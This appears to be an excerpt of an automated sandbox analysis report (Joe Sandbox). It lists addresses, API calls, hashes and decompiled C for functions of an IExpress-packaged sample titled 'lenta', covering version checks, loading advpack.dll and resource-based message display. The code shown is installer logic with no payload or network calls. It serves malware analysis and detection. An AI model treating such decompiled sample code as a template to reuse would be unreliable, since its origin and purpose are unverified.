                                                                                                                                                                                                                                                0x00103a19
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039b8
                                                                                                                                                                                                                                                0x001039b8
                                                                                                                                                                                                                                                0x001039ba
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039bc
                                                                                                                                                                                                                                                0x001039bf
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039c3
                                                                                                                                                                                                                                                0x001039c9
                                                                                                                                                                                                                                                0x001039ce
                                                                                                                                                                                                                                                0x001039d0
                                                                                                                                                                                                                                                0x001039e3
                                                                                                                                                                                                                                                0x001039e5
                                                                                                                                                                                                                                                0x001039e6
                                                                                                                                                                                                                                                0x001039f1
                                                                                                                                                                                                                                                0x001039f7
                                                                                                                                                                                                                                                0x001039fa
                                                                                                                                                                                                                                                0x00103a01
                                                                                                                                                                                                                                                0x00103a04
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103a06
                                                                                                                                                                                                                                                0x00103a09
                                                                                                                                                                                                                                                0x00103a09
                                                                                                                                                                                                                                                0x00103a0b
                                                                                                                                                                                                                                                0x00103a0b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103a09
                                                                                                                                                                                                                                                0x001039fc
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039fc
                                                                                                                                                                                                                                                0x001039d3
                                                                                                                                                                                                                                                0x001039d8
                                                                                                                                                                                                                                                0x001039da
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001039dc
                                                                                                                                                                                                                                                0x001039b6
                                                                                                                                                                                                                                                0x00103955
                                                                                                                                                                                                                                                0x0010395b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103961
                                                                                                                                                                                                                                                0x00103963
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103969
                                                                                                                                                                                                                                                0x00103915
                                                                                                                                                                                                                                                0x00103915
                                                                                                                                                                                                                                                0x0010391b
                                                                                                                                                                                                                                                0x0010391f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010392d
                                                                                                                                                                                                                                                0x00103933
                                                                                                                                                                                                                                                0x00103938
                                                                                                                                                                                                                                                0x0010393a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103940
                                                                                                                                                                                                                                                0x00103946
                                                                                                                                                                                                                                                0x0010394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010394b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038f2
                                                                                                                                                                                                                                                0x00103843
                                                                                                                                                                                                                                                0x00103845
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010384b
                                                                                                                                                                                                                                                0x0010384d
                                                                                                                                                                                                                                                0x00103883
                                                                                                                                                                                                                                                0x00103885
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010389a
                                                                                                                                                                                                                                                0x0010389e
                                                                                                                                                                                                                                                0x0010389e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a0
                                                                                                                                                                                                                                                0x001038a0
                                                                                                                                                                                                                                                0x001038a2
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038a4
                                                                                                                                                                                                                                                0x0010384f
                                                                                                                                                                                                                                                0x00103851
                                                                                                                                                                                                                                                0x00103857
                                                                                                                                                                                                                                                0x0010386e
                                                                                                                                                                                                                                                0x00103877
                                                                                                                                                                                                                                                0x0010387b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103881
                                                                                                                                                                                                                                                0x00103859
                                                                                                                                                                                                                                                0x0010385c
                                                                                                                                                                                                                                                0x00103862
                                                                                                                                                                                                                                                0x00103866
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103868
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001038f4
                                                                                                                                                                                                                                                0x001038f4
                                                                                                                                                                                                                                                0x001038f5
                                                                                                                                                                                                                                                0x001038fb
                                                                                                                                                                                                                                                0x00103901
                                                                                                                                                                                                                                                0x00103901
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010390a
                                                                                                                                                                                                                                                0x0010374b
                                                                                                                                                                                                                                                0x0010374e
                                                                                                                                                                                                                                                0x0010375c
                                                                                                                                                                                                                                                0x00103764
                                                                                                                                                                                                                                                0x00103769
                                                                                                                                                                                                                                                0x0010376e
                                                                                                                                                                                                                                                0x00103771
                                                                                                                                                                                                                                                0x0010379c
                                                                                                                                                                                                                                                0x0010379f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037a3
                                                                                                                                                                                                                                                0x001037a4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001037a4
                                                                                                                                                                                                                                                0x00103773
                                                                                                                                                                                                                                                0x00103777
                                                                                                                                                                                                                                                0x00103778
                                                                                                                                                                                                                                                0x0010377f
                                                                                                                                                                                                                                                0x00103781
                                                                                                                                                                                                                                                0x0010378e
                                                                                                                                                                                                                                                0x0010378e
                                                                                                                                                                                                                                                0x00103794
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103794
                                                                                                                                                                                                                                                0x00103783
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00103785
                                                                                                                                                                                                                                                0x0010378c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010378c
                                                                                                                                                                                                                                                0x00103750
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010372d
                                                                                                                                                                                                                                                0x0010372d
                                                                                                                                                                                                                                                0x0010396b
                                                                                                                                                                                                                                                0x0010396b
                                                                                                                                                                                                                                                0x0010396c
                                                                                                                                                                                                                                                0x0010396e
                                                                                                                                                                                                                                                0x0010396f
                                                                                                                                                                                                                                                0x00103a1e
                                                                                                                                                                                                                                                0x00103a1e
                                                                                                                                                                                                                                                0x00103a22
                                                                                                                                                                                                                                                0x00103a27
                                                                                                                                                                                                                                                0x00103a3e
                                                                                                                                                                                                                                                0x00103a3e

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 00103723
                                                                                                                                                                                                                                                • MessageBeep.USER32(00000000), ref: 001039C3
                                                                                                                                                                                                                                                • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 001039F1
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Message$BeepVersion
                                                                                                                                                                                                                                                • String ID: 3$lenta
                                                                                                                                                                                                                                                • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                                • Opcode ID: c67a03afc23dae4e2ced4c98237eef2ec0065a49e9c3f3197808456dd2aa9bbb
                                                                                                                                                                                                                                                • Instruction ID: 6035c4527165c3823c77b6b4204ae2688314eec60a8833a87c6b2af57f92467c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c67a03afc23dae4e2ced4c98237eef2ec0065a49e9c3f3197808456dd2aa9bbb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F691D571B01224DFEB398B14CC917AAB7A9AF85304F1541AAD9E9D72D1DBF08F81CB41
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00106495 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 41libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 83%
                                                                                                                                                                                                                                                			E00106495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __edi;
				signed int _t9;
				signed char _t14;
				struct HINSTANCE__* _t15;
				void* _t18;
				CHAR* _t26;
				void* _t27;
				signed int _t28;

				_t27 = __esi;
				_t18 = __ebx;
				_t9 =  *0x108004; // 0xb5a2e1bc
				_v8 = _t9 ^ _t28;
				_push(__ecx);
				E00101781( &_v268, 0x104, __ecx, "C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
				_t26 = "advpack.dll";
				E0010658A( &_v268, 0x104, _t26);
				_t14 = GetFileAttributesA( &_v268);
				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
					_t15 = LoadLibraryA(_t26);
				} else {
					_t15 = LoadLibraryExA( &_v268, 0, 8);
				}
				return E00106CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
			}













                                                                                                                                                                                                                                                0x00106495
                                                                                                                                                                                                                                                0x00106495
                                                                                                                                                                                                                                                0x001064a0
                                                                                                                                                                                                                                                0x001064a7
                                                                                                                                                                                                                                                0x001064ab
                                                                                                                                                                                                                                                0x001064bd
                                                                                                                                                                                                                                                0x001064c2
                                                                                                                                                                                                                                                0x001064d3
                                                                                                                                                                                                                                                0x001064df
                                                                                                                                                                                                                                                0x001064e8
                                                                                                                                                                                                                                                0x00106502
                                                                                                                                                                                                                                                0x001064ee
                                                                                                                                                                                                                                                0x001064f9
                                                                                                                                                                                                                                                0x001064f9
                                                                                                                                                                                                                                                0x00106516

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001064DF
                                                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 001064F9
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00000000), ref: 00106502
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$advpack.dll
                                                                                                                                                                                                                                                • API String ID: 438848745-179718922
                                                                                                                                                                                                                                                • Opcode ID: 0ec5a0a508d11837288066fec6e6cb817c8be9cec246399844ae826fde5a238a
                                                                                                                                                                                                                                                • Instruction ID: 039ac45aebcda4d55b62cfc8552671fc3a937b7a60088cb512ed3f6c02fd1935
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ec5a0a508d11837288066fec6e6cb817c8be9cec246399844ae826fde5a238a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE01F430A04208ABEB14EB64DC49EEE7778EF64310F900195F5C5A21D4DFF09EDACA51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 001028E8 Relevance: 7.6, APIs: 5, Instructions: 140memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E001028E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
				void* _v8;
				char* _v12;
				intOrPtr _v16;
				void* _v20;
				intOrPtr _v24;
				int _v28;
				int _v32;
				void* _v36;
				int _v40;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				long _t68;
				void* _t70;
				void* _t73;
				void* _t79;
				void* _t83;
				void* _t87;
				void* _t88;
				intOrPtr _t93;
				intOrPtr _t97;
				intOrPtr _t99;
				int _t101;
				void* _t103;
				void* _t106;
				void* _t109;
				void* _t110;

				_v12 = __edx;
				_t99 = __ecx;
				_t106 = 0;
				_v16 = __ecx;
				_t87 = 0;
				_t103 = 0;
				_v20 = 0;
				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
					L19:
					_t106 = 1;
				} else {
					_t62 = 0;
					_v8 = 0;
					while(1) {
						_v24 =  *((intOrPtr*)(_t99 + 0x80));
						if(E00102773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
							goto L20;
						}
						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
						_v28 = _t68;
						if(_t68 == 0) {
							_t99 = _v16;
							_t70 = _v8 + _t99;
							_t93 = _v24;
							_t87 = _v20;
							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
								goto L18;
							}
						} else {
							_t103 = GlobalAlloc(0x42, _t68);
							if(_t103 != 0) {
								_t73 = GlobalLock(_t103);
								_v36 = _t73;
								if(_t73 != 0) {
									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
										L15:
										GlobalUnlock(_t103);
										_t99 = _v16;
										L18:
										_t87 = _t87 + 1;
										_t62 = _v8 + 0x3c;
										_v20 = _t87;
										_v8 = _v8 + 0x3c;
										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
											continue;
										} else {
											goto L19;
										}
									} else {
										_t79 = _v44;
										_t88 = _t106;
										_v28 =  *((intOrPtr*)(_t79 + 0xc));
										_t101 = _v28;
										_v48 =  *((intOrPtr*)(_t79 + 8));
										_t83 = _v8 + _v16 + _v24 + 0x94;
										_t97 = _v48;
										_v36 = _t83;
										_t109 = _t83;
										do {
											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00102A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00102A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
											_t109 = _t109 + 0x18;
											_t88 = _t88 + 4;
										} while (_t88 < 8);
										_t87 = _v20;
										_t106 = 0;
										if(_v56 < 0 || _v64 > 0) {
											if(_v52 < _t106 || _v60 > _t106) {
												GlobalUnlock(_t103);
											} else {
												goto L15;
											}
										} else {
											goto L15;
										}
									}
								}
							}
						}
						goto L20;
					}
				}
				L20:
				 *_a8 = _t87;
				if(_t103 != 0) {
					GlobalFree(_t103);
				}
				return _t106;
			}

































                                                                                                                                                                                                                                                0x001028f1
                                                                                                                                                                                                                                                0x001028f4
                                                                                                                                                                                                                                                0x001028f7
                                                                                                                                                                                                                                                0x001028f9
                                                                                                                                                                                                                                                0x001028fc
                                                                                                                                                                                                                                                0x001028ff
                                                                                                                                                                                                                                                0x00102901
                                                                                                                                                                                                                                                0x00102907
                                                                                                                                                                                                                                                0x00102a62
                                                                                                                                                                                                                                                0x00102a64
                                                                                                                                                                                                                                                0x0010290d
                                                                                                                                                                                                                                                0x0010290d
                                                                                                                                                                                                                                                0x0010290f
                                                                                                                                                                                                                                                0x00102912
                                                                                                                                                                                                                                                0x00102920
                                                                                                                                                                                                                                                0x00102937
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102944
                                                                                                                                                                                                                                                0x0010294a
                                                                                                                                                                                                                                                0x0010294f
                                                                                                                                                                                                                                                0x00102a2f
                                                                                                                                                                                                                                                0x00102a32
                                                                                                                                                                                                                                                0x00102a34
                                                                                                                                                                                                                                                0x00102a37
                                                                                                                                                                                                                                                0x00102a41
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102955
                                                                                                                                                                                                                                                0x0010295e
                                                                                                                                                                                                                                                0x00102962
                                                                                                                                                                                                                                                0x00102969
                                                                                                                                                                                                                                                0x0010296f
                                                                                                                                                                                                                                                0x00102974
                                                                                                                                                                                                                                                0x0010298c
                                                                                                                                                                                                                                                0x00102a20
                                                                                                                                                                                                                                                0x00102a21
                                                                                                                                                                                                                                                0x00102a27
                                                                                                                                                                                                                                                0x00102a4c
                                                                                                                                                                                                                                                0x00102a4f
                                                                                                                                                                                                                                                0x00102a50
                                                                                                                                                                                                                                                0x00102a53
                                                                                                                                                                                                                                                0x00102a56
                                                                                                                                                                                                                                                0x00102a5c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001029b2
                                                                                                                                                                                                                                                0x001029b2
                                                                                                                                                                                                                                                0x001029b5
                                                                                                                                                                                                                                                0x001029bd
                                                                                                                                                                                                                                                0x001029c3
                                                                                                                                                                                                                                                0x001029cc
                                                                                                                                                                                                                                                0x001029d5
                                                                                                                                                                                                                                                0x001029d7
                                                                                                                                                                                                                                                0x001029da
                                                                                                                                                                                                                                                0x001029dd
                                                                                                                                                                                                                                                0x001029df
                                                                                                                                                                                                                                                0x001029ec
                                                                                                                                                                                                                                                0x001029f8
                                                                                                                                                                                                                                                0x001029fc
                                                                                                                                                                                                                                                0x001029ff
                                                                                                                                                                                                                                                0x00102a02
                                                                                                                                                                                                                                                0x00102a07
                                                                                                                                                                                                                                                0x00102a0a
                                                                                                                                                                                                                                                0x00102a0f
                                                                                                                                                                                                                                                0x00102a19
                                                                                                                                                                                                                                                0x00102a81
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00102a0f
                                                                                                                                                                                                                                                0x0010298c
                                                                                                                                                                                                                                                0x00102974
                                                                                                                                                                                                                                                0x00102962
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x0010294f
                                                                                                                                                                                                                                                0x00102912
                                                                                                                                                                                                                                                0x00102a65
                                                                                                                                                                                                                                                0x00102a68
                                                                                                                                                                                                                                                0x00102a6c
                                                                                                                                                                                                                                                0x00102a6f
                                                                                                                                                                                                                                                0x00102a6f
                                                                                                                                                                                                                                                0x00102a7d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalFree.KERNEL32 ref: 00102A6F
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharUpperA.USER32(B5A2E1BC,00000000,00000000,00000000), ref: 001027A8
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharNextA.USER32(0000054D), ref: 001027B5
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: CharNextA.USER32(00000000), ref: 001027BC
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102829
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegQueryValueExA.ADVAPI32(?,00101140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102852
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00102870
                                                                                                                                                                                                                                                  • Part of subcall function 00102773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001028A0
                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00103938,?,?,?,?,-00000005), ref: 00102958
                                                                                                                                                                                                                                                • GlobalLock.KERNEL32 ref: 00102969
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00103938,?,?,?,?,-00000005,?), ref: 00102A21
                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00102A81
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3949799724-0
                                                                                                                                                                                                                                                • Opcode ID: d1e4f9bcdfafa6e18a42f711f61ff562633fa71d72c7c783d8a5d3ecf8719141
                                                                                                                                                                                                                                                • Instruction ID: 59f887164d5c3effe53af5b399734b6832649911ac5404da4c262c964bdec73d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1e4f9bcdfafa6e18a42f711f61ff562633fa71d72c7c783d8a5d3ecf8719141
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA513E31E00219EFCB25DF98C888AAEFBB5FF48700F14416AE985E3651DBB19D41DB90
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 00104169 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 55memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 32%
                                                                                                                                                                                                                                                			E00104169(void* __eflags) {
				int _t18;
				void* _t21;

				_t20 = E0010468F("FINISHMSG", 0, 0);
				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
				if(_t21 != 0) {
					if(E0010468F("FINISHMSG", _t21, _t20) != 0) {
						if(lstrcmpA(_t21, "<None>") == 0) {
							L7:
							return LocalFree(_t21);
						}
						_push(0);
						_push(0x40);
						_push(0);
						_push(_t21);
						_t18 = 0x3e9;
						L6:
						E001044B9(0, _t18);
						goto L7;
					}
					_push(0);
					_push(0x10);
					_push(0);
					_push(0);
					_t18 = 0x4b1;
					goto L6;
				}
				return E001044B9(0, 0x4b5, 0, 0, 0x10, 0);
			}





                                                                                                                                                                                                                                                0x0010417d
                                                                                                                                                                                                                                                0x0010418f
                                                                                                                                                                                                                                                0x00104193
                                                                                                                                                                                                                                                0x001041b7
                                                                                                                                                                                                                                                0x001041d3
                                                                                                                                                                                                                                                0x001041e6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001041e7
                                                                                                                                                                                                                                                0x001041d5
                                                                                                                                                                                                                                                0x001041d6
                                                                                                                                                                                                                                                0x001041d8
                                                                                                                                                                                                                                                0x001041d9
                                                                                                                                                                                                                                                0x001041da
                                                                                                                                                                                                                                                0x001041df
                                                                                                                                                                                                                                                0x001041e1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001041e1
                                                                                                                                                                                                                                                0x001041b9
                                                                                                                                                                                                                                                0x001041ba
                                                                                                                                                                                                                                                0x001041bc
                                                                                                                                                                                                                                                0x001041bd
                                                                                                                                                                                                                                                0x001041be
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x001041be
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046A0
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: SizeofResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046A9
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001046C3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LoadResource.KERNEL32(00000000,00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046CC
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: LockResource.KERNEL32(00000000,?,00102D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001046D3
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: memcpy_s.MSVCRT ref: 001046E5
                                                                                                                                                                                                                                                  • Part of subcall function 0010468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001046EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,001030B4), ref: 00104189
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,001030B4), ref: 001041E7
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00104518
                                                                                                                                                                                                                                                  • Part of subcall function 001044B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00104554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000002.00000002.382576987.0000000000101000.00000020.00000001.01000000.00000005.sdmp, Offset: 00100000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382559810.0000000000100000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382590761.0000000000108000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000002.00000002.382603847.000000000010C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_100000_gDR79xP.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$FINISHMSG
                                                                                                                                                                                                                                                • API String ID: 3507850446-3091758298
                                                                                                                                                                                                                                                • Opcode ID: ffdf4dcc975d4a2230f961cf108fed28af686200fd031dccff00952445568669
                                                                                                                                                                                                                                                • Instruction ID: 76621849df8f5febe57cac1a4853f3ac2610f8f2e3d55689db2c1b843f779d8a
